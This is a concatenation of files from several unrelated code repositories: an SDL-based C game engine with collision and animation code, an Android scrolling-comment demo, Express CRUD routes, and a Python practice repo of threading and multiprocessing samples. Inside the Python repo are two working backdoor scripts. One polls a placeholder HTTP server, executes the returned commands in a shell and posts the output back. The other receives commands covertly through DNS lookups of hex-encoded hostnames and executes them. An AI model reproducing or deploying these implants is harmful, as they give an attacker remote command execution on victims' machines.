    SDL_RenderSetIntegerScale(renderer, SDL_TRUE);
    SDL_SetRenderDrawColor(renderer, 0, 0, 0, 0);
    input_keyboard_state_pointer = SDL_GetKeyboardState(NULL);
    // Init timer
    timer_now = SDL_GetTicks();
    timer_last = 0;
    timer_dt = 0;
    timer_fixed_dt = 1.0/60;
    timer_accumulator = 0;
    return 0;
}
// Tear down the renderer, the window and SDL itself (reverse of engine_init()).
void engine_cleanup(void)
{
    SDL_DestroyRenderer(renderer);
    SDL_DestroyWindow(window);
    SDL_Quit();
}<file_sep>#pragma once
// A pool of one component kind. `data` holds component pointers; `hashmap`
// presumably maps entity ids to slots in `data` (TODO confirm against
// init_component_type/add_component, which are defined elsewhere).
typedef struct
{
    void **data;
    int *hashmap;
    int length; // TODO: Change name to max_length
    int real_length; // number of slots currently in use
} Component_Type;
// All component pools in the ECS, one field per component kind.
typedef struct
{
    Component_Type health;
    Component_Type position;
    Component_Type anim_controller;
    Component_Type tilemap;
    Component_Type grid_collider;
} Components;
Components *components;
Component_Type init_component_type(int length);
void add_component(Component_Type *component_type, void *component_data, int entity_id);
void remove_component(Component_Type *component_type, int entity_id);
void *get_component(Component_Type *component_type, int entity_id);
#include "modules/health.h"
#include "modules/position.h"
#include "modules/rendering/animation.h"
#include "modules/rendering/tilemap.h"
#include "modules/collision/box_collider.h"
<file_sep>#include "engine.h"
#include "game.h"
int main()
{
    // Fix: bail out if SDL setup failed instead of running the game loop
    // against a missing window/renderer (engine_init returns non-zero on
    // failure; its result was previously ignored).
    if(engine_init() != 0)
    {
        return 1;
    }
    game_init();
    loop();
    game_cleanup();
    engine_cleanup();
    return 0;
}<file_sep>#include "tilemap.h"
// Draw every tilemap component via render_sprite. The map is currently
// anchored to a hardcoded entity position (id 32) instead of the tilemap's
// own entity - an acknowledged temporary hack (looks like a scrolling/camera
// workaround - TODO confirm intent before removing).
void render_tilemap(Component_Type *cmp_type, Component_Type *pos)
{
    for(int i = 0 ; i < cmp_type->real_length; i++)
    {
        Tilemap *target = cmp_type->data[i];
        //Position *target_pos = get_component(pos, target->entity_id);
        // Temporary hack
        Position *target_pos = get_component(pos, 32); // Hardcoded player pos id
        int x = 0;
        int y = 0;
        if(target_pos)
        {
            x = target_pos->x;
            y = target_pos->y;
        }
        render_sprite(target->sprite, target->sprite_ids, target->map_width,
                      target->map_height, x, y);
    }
}<file_sep>Note: collision is currently broken so it has temporarily been disabled in the demo.
## About
Feather Engine is a lightweight 2D game engine.
Before I started working on this I was frustrated by the selection of existing game engines. Some of them produced bloated game builds, some had clunky interfaces or only supported scripting languages I didn't want to use, and some just didn't have the underlying structure that I was looking for. So I had two options: I could settle for a less than ideal engine, or I could build my own idyllic engine from scratch. I chose the latter, and thus, Feather Engine was born. The engine has been re-written about four times now and is still an ongoing project; I'm currently working towards its first release.
Compile using the makefile - you'll need sdl2, sdl2_image and sdl2_ttf.
<file_sep>#pragma once
int hash(int key, int array_length);<file_sep>#include "sprite.h"
#include "../../engine.h"
// Blit one tileset tile per id in the row-major id_array_width x
// id_array_height array, offset by (pos_x, pos_y) on screen.
// Fix: dropped the floor() call - `id / number_of_tiles_horizontal` is
// integer division and already truncates, so floor() was a no-op (and
// math.h is not visibly included here).
// NOTE(review): tile ids are assumed non-negative - confirm.
void render_sprite(Sprite *sprite, int *tile_ids, unsigned int id_array_width,
                   unsigned int id_array_height, int pos_x, int pos_y)
{
    for(unsigned int x = 0; x < id_array_width; x++)
    {
        for(unsigned int y = 0; y < id_array_height; y++)
        {
            int id = tile_ids[(y * id_array_width) + x];
            // Modulo selects the tile column, division the tile row.
            sprite->src.x = (id % sprite->number_of_tiles_horizontal) * sprite->tile_width;
            sprite->src.y = (id / sprite->number_of_tiles_horizontal) * sprite->tile_height;
            sprite->dst.x = x * sprite->tile_width + pos_x;
            sprite->dst.y = y * sprite->tile_height + pos_y;
            SDL_RenderCopy(renderer, sprite->tex, &sprite->src, &sprite->dst);
        }
    }
}<file_sep>#pragma once
// World-space position of an entity, in pixels.
typedef struct
{
    int entity_id; // owning entity
    int x;
    int y;
} Position; <file_sep>#pragma once
#include <SDL2/SDL.h>
// A tileset texture plus scratch rects reused while blitting single tiles.
typedef struct
{
    unsigned int tile_width, tile_height; // size of one tile in pixels
    unsigned int number_of_tiles_horizontal, number_of_tiles_vertical;
    SDL_Texture *tex;
    SDL_Rect src; // scratch: source tile rect within `tex`
    SDL_Rect dst; // scratch: destination rect on screen
} Sprite;
void render_sprite(Sprite *sprite, int *tile_ids ,unsigned int id_array_width,
unsigned int id_array_height, int pos_x, int pos_y);<file_sep>#include "animation.h"
#include "../../engine.h"
#include "../../component.h"
#include <stdio.h>
// Advance every animation controller by the frame delta (read_timer_dt()).
// When the active clip's per-frame time elapses, the frame index advances;
// a finished one-shot clip falls back to the controller's default clip.
void update_anim(Component_Type *cmp_type)
{
    // animation speedup glitch is caused by timer accumulator in engine.c
    //  - this has been fixed by moving anim update into the render loop but I might want to look further into it
    for(int i = 0; i < cmp_type->real_length; i++)
    {
        Anim_Controller *target = cmp_type->data[i];
        Anim *anim = &target->anims[target->anim_id];
        anim->dt_accumulator += read_timer_dt();
        if(anim->dt_accumulator >= anim->speed)
        {
            target->frame_id++;
            // Fix: keep the leftover time instead of zeroing the accumulator
            // so frame pacing does not drift when dt is not an exact multiple
            // of the frame period.
            anim->dt_accumulator -= anim->speed;
        }
        if(target->frame_id >= anim->frame_count)
        {
            if(!anim->loop)
            {
                // One-shot clip finished: return to the default clip.
                target->anim_id = target->default_anim_id;
            }
            target->frame_id = 0;
        }
    }
}
// Draw the current frame of every animation controller at its entity's
// position (falls back to (0,0) when the entity has no Position component).
void render_anim(Component_Type *cmp_type, Component_Type *pos)
{
    for(int i = 0; i < cmp_type->real_length; i++)
    {
        Anim_Controller *target = cmp_type->data[i];
        Position *target_pos = get_component(pos, target->entity_id);
        int x = 0;
        int y = 0;
        if(target_pos)
        {
            x = target_pos->x;
            y = target_pos->y;
        }
        // Render the frame as a 1x1 tile map. A stack variable replaces the
        // previous per-call malloc/free pair, which the old TODO already
        // flagged as a hack.
        int tile_id = target->anims[target->anim_id].tile_ids[target->frame_id];
        render_sprite(target->sprite, &tile_id, 1, 1, x, y);
    }
}
<file_sep>#include <stdlib.h>
#include "grid_collider.h"
// Sweep `box_collider` through every Grid_Collider one cell-sized step at a
// time, clipping the requested (move_x, move_y) to the distance actually free
// of solid cells. The axis with the larger |move| ("greater") is stepped in
// runs interleaved with single steps of the other axis ("lesser") so the
// swept path approximates the movement direction. Returns the clipped move.
// Fixes: two copy-paste bugs where `variable_offset_2` *assigned*
// box_collider->y = box_collider->h (resp. ->x = ->w), mutating the collider,
// instead of adding the two values like every parallel assignment.
Collision_Info grid_collision(Component_Type *grid_collider, Component_Type *position,
                              Box_Collider *box_collider, int move_x, int move_y)
{
    Collision_Info collision_info;
    collision_info.modified_move_x = 0;
    collision_info.modified_move_y = 0;
    // Greater of the two movement vectors
    int *greater_move_pointer;
    int greater_move_abs = 0;
    int greater_move_sign = 0;
    int greater_move_step = 0;
    int greater_move_step_remainder = 0;
    int greater_directional_offset = 0;
    int greater_variable_offset_1 = 0;
    int greater_variable_offset_2 = 0;
    int greater_multiplier = 0;
    int greater_target_axis = 0;
    int greater_target_cell_dimension = 0;
    // Lesser of the two movement vectors
    int *lesser_move_pointer;
    int lesser_move_abs = 0;
    int lesser_move_sign = 0;
    int lesser_move_step = 0;
    int lesser_directional_offset = 0;
    int lesser_variable_offset_1 = 0;
    int lesser_variable_offset_2 = 0;
    int lesser_multiplier = 0;
    int lesser_target_axis = 0;
    int lesser_target_cell_dimension = 0;
    for(int i = 0; i < grid_collider->real_length; i++)
    {
        Grid_Collider *target = grid_collider->data[i];
        Position *target_pos = get_component(position, target->entity_id);
        // Differentiate lesser and greater move
        // This can be made more efficient
        int abs_move_x = abs(move_x);
        int abs_move_y = abs(move_y);
        if(abs_move_x > abs_move_y)
        {
            // Greater values assignment
            greater_move_pointer = &collision_info.modified_move_x;
            greater_move_abs = abs_move_x;
            greater_move_sign = (int)copysign(1, move_x);
            greater_directional_offset = (greater_move_sign > 0) ? box_collider->x + box_collider->w : box_collider->x;
            greater_variable_offset_1 = box_collider->x;
            greater_variable_offset_2 = box_collider->x + box_collider->w;
            greater_multiplier = 1;
            greater_target_axis = target_pos->x;
            greater_target_cell_dimension = target->cell_width;
            // Lesser values assignment
            lesser_move_pointer = &collision_info.modified_move_y;
            lesser_move_abs = abs_move_y;
            lesser_move_sign = (int)copysign(1, move_y);
            lesser_directional_offset = (lesser_move_sign < 0) ? box_collider->y + box_collider->h : box_collider->y;
            lesser_variable_offset_1 = box_collider->y;
            // Bug fix: was `box_collider->y = box_collider->h` (an assignment
            // that clobbered the collider's y), now the intended sum.
            lesser_variable_offset_2 = box_collider->y + box_collider->h;
            lesser_multiplier = target->grid_width;
            lesser_target_axis = target_pos->y;
            lesser_target_cell_dimension = target->cell_height;
        }
        else
        {
            // Greater values assignment
            greater_move_pointer = &collision_info.modified_move_y;
            greater_move_abs = abs_move_y;
            greater_move_sign = (int)copysign(1, move_y);
            greater_directional_offset = (greater_move_sign < 0) ? box_collider->y + box_collider->h : box_collider->y;
            greater_variable_offset_1 = box_collider->y;
            greater_variable_offset_2 = box_collider->y + box_collider->h;
            greater_multiplier = target->grid_width;
            greater_target_axis = target_pos->y;
            greater_target_cell_dimension = target->cell_height;
            // Lesser values assignment
            lesser_move_pointer = &collision_info.modified_move_x;
            lesser_move_abs = abs_move_x;
            lesser_move_sign = (int)copysign(1, move_x);
            lesser_directional_offset = (lesser_move_sign > 0) ? box_collider->x + box_collider->w : box_collider->x;
            lesser_variable_offset_1 = box_collider->x;
            // Bug fix: was `box_collider->x = box_collider->w`, same issue as above.
            lesser_variable_offset_2 = box_collider->x + box_collider->w;
            lesser_multiplier = 1;
            lesser_target_axis = target_pos->x;
            lesser_target_cell_dimension = target->cell_width;
        }
        // Find appropriate x y movement steps
        if(greater_move_abs != 0)
        {
            if(lesser_move_abs != 0)
            {
                // Both moves are non-zero
                greater_move_step = (greater_move_abs + lesser_move_abs - 1) / lesser_move_abs;
                greater_move_step_remainder = greater_move_abs - greater_move_abs / greater_move_step * greater_move_step;
                lesser_move_step = 1;
            }
            else
            {
                // Only one move is non-zero
                greater_move_step_remainder = greater_move_abs;
                lesser_move_step = 0;
            }
        }
        else
        {
            // Both moves are zero
            return collision_info;
        }
        // Check collision on main body of move
        int col_id_1 = 0;
        int col_id_2 = 0;
        for(int i = 0; i < lesser_move_abs; i++)
        {
            for(int g = 0; g < greater_move_step; g++)
            {
                // TODO: test move pointer
                col_id_1 = target->collision_ids[(lesser_variable_offset_1 + *lesser_move_pointer - lesser_target_axis)
                                                 / lesser_target_cell_dimension * lesser_multiplier
                                                 + (greater_directional_offset + *greater_move_pointer - greater_target_axis)
                                                 / greater_target_cell_dimension * greater_multiplier];
                col_id_2 = target->collision_ids[(lesser_variable_offset_2 + *lesser_move_pointer - lesser_target_axis)
                                                 / lesser_target_cell_dimension * lesser_multiplier
                                                 + (greater_directional_offset + *greater_move_pointer - greater_target_axis)
                                                 / greater_target_cell_dimension * greater_multiplier];
                if(col_id_1 != 0 || col_id_2 != 0)
                {
                    greater_move_step = 0;
                    greater_move_step_remainder = 0;
                    break;
                }
                *greater_move_pointer += 1 * greater_move_sign;
            }
            for(int l = 0; l < lesser_move_step; l++)
            {
                col_id_1 = target->collision_ids[(lesser_directional_offset + *lesser_move_pointer - lesser_target_axis)
                                                 / lesser_target_cell_dimension * lesser_multiplier
                                                 + (greater_variable_offset_1 + *greater_move_pointer - greater_target_axis)
                                                 / greater_target_cell_dimension * greater_multiplier];
                col_id_2 = target->collision_ids[(lesser_directional_offset + *lesser_move_pointer - lesser_target_axis)
                                                 / lesser_target_cell_dimension * lesser_multiplier
                                                 + (greater_variable_offset_2 + *greater_move_pointer - greater_target_axis)
                                                 / greater_target_cell_dimension * greater_multiplier];
                if(col_id_1 != 0 || col_id_2 != 0)
                {
                    lesser_move_step = 0;
                    break;
                }
                *lesser_move_pointer += 1 * lesser_move_sign;
            }
        }
        // Check collision on remainder of move
        for(int gr = 0; gr < greater_move_step_remainder; gr++)
        {
            col_id_1 = target->collision_ids[(lesser_variable_offset_1 + *lesser_move_pointer - lesser_target_axis)
                                             / lesser_target_cell_dimension * lesser_multiplier
                                             + (greater_directional_offset + *greater_move_pointer - greater_target_axis)
                                             / greater_target_cell_dimension * greater_multiplier];
            col_id_2 = target->collision_ids[(lesser_variable_offset_2 + *lesser_move_pointer - lesser_target_axis)
                                             / lesser_target_cell_dimension * lesser_multiplier
                                             + (greater_directional_offset + *greater_move_pointer - greater_target_axis)
                                             / greater_target_cell_dimension * greater_multiplier];
            if(col_id_1 != 0 || col_id_2 != 0)
            {
                greater_move_step_remainder = 0;
                break;
            }
            *greater_move_pointer += 1 * greater_move_sign;
        }
        for(int l = 0; l < lesser_move_step; l++)
        {
            col_id_1 = target->collision_ids[(lesser_directional_offset + *lesser_move_pointer - lesser_target_axis)
                                             / lesser_target_cell_dimension * lesser_multiplier
                                             + (greater_variable_offset_1 + *greater_move_pointer - greater_target_axis)
                                             / greater_target_cell_dimension * greater_multiplier];
            col_id_2 = target->collision_ids[(lesser_directional_offset + *lesser_move_pointer - lesser_target_axis)
                                             / lesser_target_cell_dimension * lesser_multiplier
                                             + (greater_variable_offset_2 + *greater_move_pointer - greater_target_axis)
                                             / greater_target_cell_dimension * greater_multiplier];
            if(col_id_1 != 0 || col_id_2 != 0)
            {
                lesser_move_step = 0;
                break;
            }
            *lesser_move_pointer += 1 * lesser_move_sign;
        }
        //*lesser_move_pointer = 10;
        move_x = collision_info.modified_move_x;
        move_y = collision_info.modified_move_y;
    }
    return collision_info;
}<file_sep>#pragma once
#include "sprite.h"
#include "../../component.h"
// One animation clip: a sequence of tileset ids played at a fixed speed.
typedef struct
{
    unsigned int frame_count;
    unsigned int *tile_ids; // ID's corresponding to tileset
    double speed; // seconds per frame (compared against dt_accumulator)
    double dt_accumulator; // time accrued since the last frame advance
    char loop; // non-zero: restart when finished; zero: fall back to the default clip
} Anim;
// Per-entity animation state: which clip is active and which frame is shown.
typedef struct
{
    int entity_id;
    Sprite *sprite; // tileset the clip ids index into
    Anim *anims; // array of clips, indexed by anim_id
    unsigned int anim_id; // currently playing clip
    unsigned int frame_id; // index into the current clip's tile_ids
    unsigned int default_anim_id; // clip resumed after a one-shot clip ends
} Anim_Controller;
void update_anim(Component_Type *cmp_type);
void render_anim(Component_Type *component, Component_Type *pos);<file_sep>#include "box_collider.h"
// Sweep `active_collider` against every Box_Collider one pixel per axis at a
// time and clip (move_x, move_y) at the first non-trigger overlap.
// Fixes over the previous version:
//  - iterative_move_x/y and both *_done flags were read uninitialized (UB);
//  - the Y-axis half of the overlap test read `active_collider->x + ... +
//    target->y` (wrong member and `+` where a `>` comparison belongs);
//  - the loop could spin forever once an axis finished its move without a
//    collision, because the done flag was never set on that path.
// `collision_ids_length` is kept for interface compatibility (unused here).
Collision_Info box_collision(Component_Type *colliders, Component_Type *position, Box_Collider *active_collider,
                             int move_x, int move_y, unsigned int collision_ids_length)
{
    int move_sign_x = (int)copysign(1, move_x);
    int move_sign_y = (int)copysign(1, move_y);
    Collision_Info collision_info;
    for(int i = 0; i < colliders->real_length; i++)
    {
        Box_Collider *target = colliders->data[i];
        Position *target_pos = get_component(position, target->entity_id);
        (void)target_pos; // looked up but not yet used (as in the original)
        int iterative_move_x = 0;
        int iterative_move_y = 0;
        int collision_x_done = 0;
        int collision_y_done = 0;
        while(!collision_x_done || !collision_y_done)
        {
            if(!collision_x_done)
            {
                if(abs(iterative_move_x) < abs(move_x))
                {
                    iterative_move_x += move_sign_x;
                    if(active_collider->x + iterative_move_x < target->x + target->w &&
                       active_collider->x + iterative_move_x + active_collider->w > target->x &&
                       active_collider->y + iterative_move_y < target->y + target->h &&
                       active_collider->y + iterative_move_y + active_collider->h > target->y)
                    {
                        if(!target->is_trigger)
                        {
                            // Step back out of the overlap and stop the x sweep.
                            iterative_move_x -= move_sign_x;
                            move_x = iterative_move_x;
                            collision_x_done = 1;
                        }
                        // TODO: add support for triggers
                    }
                }
                else
                {
                    collision_x_done = 1; // full x distance is free
                }
            }
            if(!collision_y_done)
            {
                if(abs(iterative_move_y) < abs(move_y))
                {
                    iterative_move_y += move_sign_y;
                    if(active_collider->x + iterative_move_x < target->x + target->w &&
                       active_collider->x + iterative_move_x + active_collider->w > target->x &&
                       active_collider->y + iterative_move_y < target->y + target->h &&
                       active_collider->y + iterative_move_y + active_collider->h > target->y)
                    {
                        if(!target->is_trigger)
                        {
                            iterative_move_y -= move_sign_y;
                            move_y = iterative_move_y;
                            collision_y_done = 1;
                        }
                        // TODO: add support for triggers
                    }
                }
                else
                {
                    collision_y_done = 1; // full y distance is free
                }
            }
        }
    }
    collision_info.modified_move_x = move_x;
    collision_info.modified_move_y = move_y;
    return collision_info;
} | 44100de57a97ef71e93cf351d55edbeed3de8578 | [
"Markdown",
"C",
"Makefile"
] | 25 | C | Bizbud/Feather-Engine | 967e3e705eed93d83a66f7faf4244a46951776f0 | 4dbcc989cbb7878ae8ca02b72e9d188fb2e4b13d |
refs/heads/master | <repo_name>JustinXiang/BarrageView<file_sep>/README.md
# BarrageView
一款自定义的可点击图文弹幕
因为项目需要,原版弹幕无法满足需求,专门修改的一款可以自定义修改弹幕视图的图文弹幕。

<file_sep>/app/src/main/java/read/it/myapplication/MainActivity.java
package read.it.myapplication;
import android.os.Handler;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import java.util.ArrayList;
import read.it.myapplication.widgets.Barrage;
import read.it.myapplication.widgets.BarrageView;
/**
 * Demo activity driving a {@link BarrageView}: every 10 seconds it appends
 * ten more barrage (danmaku) items and hands the list to the view.
 * NOTE(review): `date` is never cleared, so the list grows without bound
 * while the activity lives - confirm whether BarrageView expects that.
 */
public class MainActivity extends AppCompatActivity implements BarrageView.PostPirset {
    private BarrageView barrageview;
    private Runnable runnable;
    private boolean start=false;
    ArrayList<Barrage> date=new ArrayList<>(); // barrage (danmaku) items shown by the view
    private Handler handler=new Handler();
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        findId();
        init();
    }
    private void findId() {
        barrageview = findViewById(R.id.barrageview);
    }
    private void init(){
        barrageview.setContext(this);
        barrageview.setPirset(this);
        start=true;
        startDanMu();
    }
    // Barrage click callback (BarrageView.PostPirset); intentionally empty here.
    @Override
    public void postPirset(int post_id, int pirset) {
    }
    // Schedule the repeating task that feeds barrage items to the view.
    private void startDanMu(){
//        danMuControl.addPicturDanMu(bean.account_avatar, bean.content.get(0).content, bean.is_praise);
        runnable = new Runnable() {
            @Override
            public void run() {
                for (int i = 0; i < 10; i++) {
                    date.add(new Barrage("http://img.mp.itc.cn/upload/20170306/aa50c412890a43fc96f364b7fe66e6e3_th.jpeg", "哈哈哈哈",0,i));
                }
                if(barrageview!=null) {
                    barrageview.setDateList(date);
                    if(start) {
                        handler.postDelayed(this, 10000);
                    }
                }
            }
        };
        runnable.run();
    }
}
| 5b28e7c15fda68c9df47d4a4ebc169aa29064b9b | [
"Markdown",
"Java"
] | 2 | Markdown | JustinXiang/BarrageView | 9f1fe4a28ed59f172c77949f53e8dcd64f30031e | dd040dcb1daee5de0677810a3e2f0d4903aab6a0 |
refs/heads/main | <file_sep>const express=require('express');
const router=express.Router();
const Option=require('../models/option');
router.get('/', async(req,res)=>{
try {
const option=await Option.find();
res.send(option)
} catch (error) {
res.send('Error');
}
});
router.post('/',async(req,res)=>{
const option=new Option({
optiontext: req.body.optiontext,
questionid: req.body.questionid
})
try{
const a1=await option.save();
res.json(a1);
}
catch(err)
{
res.send(err);
}
});
router.get('/:id', async(req,res) => {
try{
const option = await Option.findById(req.params.id)
res.json(option)
}catch(err){
res.send('Error ' + err)
}
})
router.patch('/:id',async(req,res)=> {
try{
const option = await Option.findById(req.params.id)
option.optiontext= req.body.optiontext,
option.questionid= req.body.questionid
const a1 = await option.save()
res.json(a1)
}catch(err){
res.send('Error')
}
})
router.delete('/:id',async(req,res)=> {
try{
const option = await Option.findById(req.params.id)
const a1 = await option.remove()
res.json(a1)
}catch(err){
res.send('Error')
}
})
module.exports=router;<file_sep>const express=require('express');
const router=express.Router();
const Answer=require('../models/answer');
router.get('/', async(req,res)=>{
try {
const answer=await Answer.find();
res.send(answer)
} catch (error) {
res.send('Error');
}
});
router.post('/',async(req,res)=>{
const answer=new Answer({
answer:req.body.answer,
questionid:req.body.questionid
})
try{
const a1=await answer.save();
res.json(a1);
}
catch(err)
{
res.send(err);
}
});
router.get('/:id', async(req,res) => {
try{
const answer = await Answer.findById(req.params.id)
res.json(answer)
}catch(err){
res.send('Error ' + err)
}
})
router.patch('/:id',async(req,res)=> {
try{
const answer = await Answer.findById(req.params.id)
answer.answer= req.body.answer,
answer.questionid= req.body.questionid
const a1 = await answer.save()
res.json(a1)
}catch(err){
res.send('Error')
}
})
router.delete('/:id',async(req,res)=> {
try{
const answer = await Answer.findById(req.params.id)
const a1 = await answer.remove()
res.json(a1)
}catch(err){
res.send('Error')
}
})
module.exports=router; | aa542b9bf012bbaf36ef4fe82b9e432a61170f55 | [
"JavaScript"
] | 2 | JavaScript | praveen264/Codenx | a18544b76277b09bd3651ffc09c882ee84277c08 | 45d127627cf9ef6a1102f2a175e33e9fb8c8ee35 |
refs/heads/master | <file_sep>import matplotlib.pyplot as plt
import networkx as nx
def draw_cycle_graph():
g = nx.cycle_graph(24)
pos = nx.spring_layout(G, iterations=200)
nx.draw(g, pos, node_color=range(24), node_size=800, cmap=plt.cm.Blues)
plt.show()
def main():
draw_cycle_graph()
if __name__ == '__main__':
main()
<file_sep>import requests
import subprocess
import time
SERVER = "Your Server is here"
PORT = 8080
URL = "http://{}:{}".format(SERVER, PORT)
def main():
while True:
req = requests.get(URL)
command = req.text
if 'terminate' in command:
break
else:
result = subprocess.Popen(command, shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if len(result.stderr.read()) == 0:
post_response = requests.post(url=URL,
data=result.stdout.read())
else:
post_response = requests.post(url=URL,
data=result.stderr.read())
time.sleep(2)
if __name__ == '__main__':
main()
<file_sep>import logging
import concurrent.futures
# logging.basicConfig(
# level=logging.DEBUG, format='%(threadName)s: %(message)s'
# )
logging.basicConfig(
level=logging.DEBUG, format='%(processName)s: %(message)s'
)
def worker(x, y):
logging.debug('start')
r = x * y
logging.debug(r)
logging.debug('end')
return r
def sample_threading():
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
f1 = executor.submit(worker, 2, 5)
f2 = executor.submit(worker, 2, 5)
logging.debug(f1.result())
logging.debug(f2.result())
# map sample
args = [[2, 2], [5, 5]]
r = executor.map(worker, *args)
logging.debug(r)
logging.debug([i for i in r])
def sample_multiprocessing():
with concurrent.futures.ProcessPoolExecutor(max_workers=5) as executor:
f1 = executor.submit(worker, 2, 5)
f2 = executor.submit(worker, 2, 5)
logging.debug(f1.result())
logging.debug(f2.result())
# map sample
args = [[2, 2], [5, 5]]
r = executor.map(worker, *args)
logging.debug(r)
logging.debug([i for i in r])
def main():
# sample_threading()
sample_multiprocessing()
if __name__ == '__main__':
main()
<file_sep>import queue
from multiprocessing.managers import BaseManager
queue = queue.Queue()
class QueueManager(BaseManager):
pass
def main():
QueueManager.register(
'get_queue', callable=lambda: queue
)
manager = QueueManager(
address=('127.0.0.1', 50000),
authkey=b'basemanager'
)
server = manager.get_server()
server.serve_forever()
if __name__ == '__main__':
main()
<file_sep>BANNER = '''
{a} _____{b} _____{c} __ {d} _____{e} __ __ {f} _____{g} _____{h} __{i} _____{j} _____
{a}| __{b}| {c}| | {d}| | {e}| | | {f}| {g}| _ {h}|__| {i}| {j}| __ |
{a}|__ {b}|- -{c}| |__{d}| -{e}|_ _| {f}| | | {g}| {h}| | {i}| | {j}| -|
{a}|_____{b}|_____{c}|_____{d}|__|__|{e} |_| {f}|_|_|_{g}|__|__{h}|_____{i}|_____{j}|__|__|
'''
class Color:
    """ANSI SGR escape sequences for terminal text styling.

    Bug fix: ``BOLD`` previously used the malformed escape ``'\\038[1m'``
    (a NUL byte followed by the literal characters ``8[1m``); it is now the
    correct ``ESC [ 1 m`` sequence. ``REVERCE`` keeps its original
    (misspelled) name for backward compatibility; ``REVERSE`` is provided
    as a correctly spelled alias.
    """

    BLACK = '\033[30m'
    RED = '\033[31m'
    GREEN = '\033[32m'
    YELLOW = '\033[33m'
    BLUE = '\033[34m'
    PURPLE = '\033[35m'
    CYAN = '\033[36m'
    WHITE = '\033[37m'
    END = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    INVISIBLE = '\033[08m'
    REVERCE = '\033[07m'
    REVERSE = REVERCE  # correctly spelled alias
def main():
print(BANNER.format(
a=Color.RED,
b=Color.YELLOW,
c=Color.GREEN,
d=Color.CYAN,
e=Color.BLUE,
f=Color.RED,
g=Color.YELLOW,
h=Color.GREEN,
i=Color.CYAN,
j=Color.BLUE
))
if __name__ == '__main__':
main()
<file_sep># -*- coding: utf-8 -*-
import dns.resolver
import subprocess
import time
DOMAIN_SERVER = 'Cache DNS Server is here'
DOMAIN_SERVER_PORT = 53
DOMAIN = 'your domain is here'
TRIGGER_HOST = '0x300x310x300x310x300x31' + DOMAIN
def can_be_resolved(host):
resolver = dns.resolver.Resolver()
resolver.nameservers = [DOMAIN_SERVER]
resolver.nameserver_ports = {DOMAIN_SERVER: DOMAIN_SERVER_PORT}
try:
answers = resolver.query(qname=host, rdtype='A')
except:
return False
if len(answers) >= 1:
return True
else:
return False
def get_command():
start_num = 0x61 # a
loop_num = start_num # a
end_num = 0x7a # z
resoloved_hostname = ''
ret_command = ''
while True:
hostname = resoloved_hostname + str(hex(loop_num)) + DOMAIN
if can_be_resolved(hostname):
resoloved_hostname += str(hex(loop_num))
ret_command += chr(loop_num)
loop_num = start_num
continue
if loop_num == end_num:
break
else:
loop_num += 1
print('resolved_name_host : ', resoloved_hostname + DOMAIN)
return ret_command
def execute_command(command):
print('command : ', command)
result = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return result.stdout.read()
def report_to_server(result):
print('result : ', result)
# Communication to the report server add here.
def main():
# interval_time >= TTL
interval_time = 10
while True:
for i in range(interval_time):
time.sleep(1)
print('\r[{}{}]'.format('*'*(i+1), '-'*(interval_time-(i+1))), end='')
if can_be_resolved(TRIGGER_HOST):
print('\n')
command = get_command()
result = execute_command(command)
report_to_server(result)
print('\n')
if __name__ == '__main__':
main()
<file_sep># practise_python
This repository is storage for practising programming in Python
<file_sep>import logging
import multiprocessing
import time
logging.basicConfig(
level=logging.DEBUG, format='%(processName)s: %(message)s'
)
def process(i):
logging.debug('start')
time.sleep(2)
logging.debug('end')
return i
def f():
with multiprocessing.Pool(5) as p:
print('Execute Sync Process')
logging.debug(p.apply(process, (0,)))
print('Execute Async Process')
p1 = p.apply_async(process, (1,))
p2 = p.apply_async(process, (2,))
p3 = p.apply_async(process, (3,))
logging.debug(p1.get())
logging.debug(p2.get())
logging.debug(p3.get())
def f2():
print("[*]map")
with multiprocessing.Pool(5) as p:
r = p.map(process, [1, 2, 3])
logging.debug('Executed')
logging.debug(r)
print("[*]map_async")
with multiprocessing.Pool(5) as p:
r = p.map_async(process, [1, 2, 3])
logging.debug('Executed')
logging.debug(r.get())
print("[*]imap")
with multiprocessing.Pool(5) as p:
r = p.imap(process, [1, 2, 3])
logging.debug([i for i in r])
def lock_process(data, lock):
logging.debug(id(data))
with lock:
i = data['x']
time.sleep(2)
data['x'] = i + 1
logging.debug(str(data) + str(id(data)))
def sample_lock():
data = {'x': 0}
print('data id :', id(data))
lock = multiprocessing.Lock()
# data is not shared , but id is the same.
t1 = multiprocessing.Process(target=lock_process, args=(data, lock))
t2 = multiprocessing.Process(target=lock_process, args=(data, lock))
t1.start()
t2.start()
t1.join()
t2.join()
logging.debug(str(data) + str(id(data)))
def process_pipe(conn):
conn.send(['message'])
time.sleep(5)
conn.close()
def sample_pipe():
parent_conn, child_conn = multiprocessing.Pipe()
p = multiprocessing.Process(target=process_pipe, args=(parent_conn, ))
p.start()
logging.debug(child_conn.recv())
def process_value_array(num, arr):
logging.debug(num)
num.value += 1.0
logging.debug(arr)
for i in range(len(arr)):
arr[i] *= 2
def sample_value_array():
num = multiprocessing.Value('f', 0.0)
arr = multiprocessing.Array('i', [1, 2, 3, 4, 5])
p1 = multiprocessing.Process(target=process_value_array, args=(num, arr))
p2 = multiprocessing.Process(target=process_value_array, args=(num, arr))
p1.start()
p2.start()
p1.join()
p2.join()
logging.debug(num.value)
logging.debug(arr[:])
def process_manager(l, d, n):
l.reverse()
d['x'] += 1
n.y += 1
def sample_manager():
# Manager is later than Value, Array.
with multiprocessing.Manager()as manager:
l = manager.list()
d = manager.dict()
n = manager.Namespace()
l.append(1)
l.append(2)
l.append(3)
d['x'] = 0
n.y = 0
p1 = multiprocessing.Process(target=process_manager, args=(l, d, n))
p2 = multiprocessing.Process(target=process_manager, args=(l, d, n))
p1.start()
p2.start()
p1.join()
p2.join()
logging.debug(l)
logging.debug(d)
logging.debug(n)
def main():
# f()
# f2()
# sample_lock()
# sample_pipe()
# sample_value_array()
sample_manager()
if __name__ == '__main__':
main()
<file_sep>import time
import threading
def thread(num):
print("Thread Start {}".format(num))
time.sleep(2)
print("Thread End {}".format(num))
def sample():
for i in range(1, 4):
threading.Thread(target=thread, name="th", args=(i,)).start()
def main():
sample()
if __name__ == '__main__':
main()
